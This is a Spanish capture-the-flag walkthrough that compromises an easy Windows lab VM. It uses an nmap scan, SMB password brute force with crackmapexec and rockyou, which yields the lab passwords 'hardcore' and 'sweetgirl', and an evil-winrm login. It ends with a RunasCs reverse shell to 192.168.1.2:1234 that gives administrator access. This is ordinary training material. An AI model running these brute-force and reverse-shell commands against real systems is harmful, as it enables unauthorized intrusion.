Enumeramos puertos (máquina Windows):
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.12
❯ nmap -sCV -p 80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49674 -oN 02-targeted.txt 192.168.1.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 20:01 -04
Nmap scan report for 192.168.1.12
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
...
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-IURF14RBVGV, ...El sitio web revela un usuario (nica):
❯ curl http://192.168.1.12
Hey bro,
You asked for an easy Windows VM, enjoy it.
- nicaHacemos fuerza bruta de SMB con crackmapexec:
❯ crackmapexec smb 192.168.1.12 -u nica -p ~/Documents/wordlists/rockyou.txt
...
SMB 192.168.1.12 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\nica:hardcore
...Nos conectamos con evil-winrm:
❯ evil-winrm -u nica -i 192.168.1.12
Enter Password: hardcore
...
*Evil-WinRM* PS C:\Users\nica\Documents>Obtenemos la primera flag. Enumerando usuarios encontramos akanksha, miembro de Administradores:
*Evil-WinRM* PS C:\Users\nica> net users
...
Administrador akanksha DefaultAccount
...
*Evil-WinRM* PS C:\Users\nica> net user akanksha
...
Miembros del grupo local *Idministritirs
*Usuarios
...Hacemos fuerza bruta de su contraseña:
❯ crackmapexec smb 192.168.1.12 -u akanksha -p ~/Documents/wordlists/rockyou.txt
...
SMB 192.168.1.12 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\akanksha:sweetgirl
...Usamos RunasCs para ejecutar una reverse shell como akanksha:
*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe
*Evil-WinRM* PS C:\Users\nica> .\RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.1.2:1234
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2568 created in background.
❯ ncat -nlvp 1234
Ncat: Connection from 192.168.1.12:49698.
Microsoft Windows [Versión 10.0.17763.107]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32> whoami
win-iurf14rbvgv\akankshaObtenemos una terminal de akanksha (administrador) y la flag.
Fin.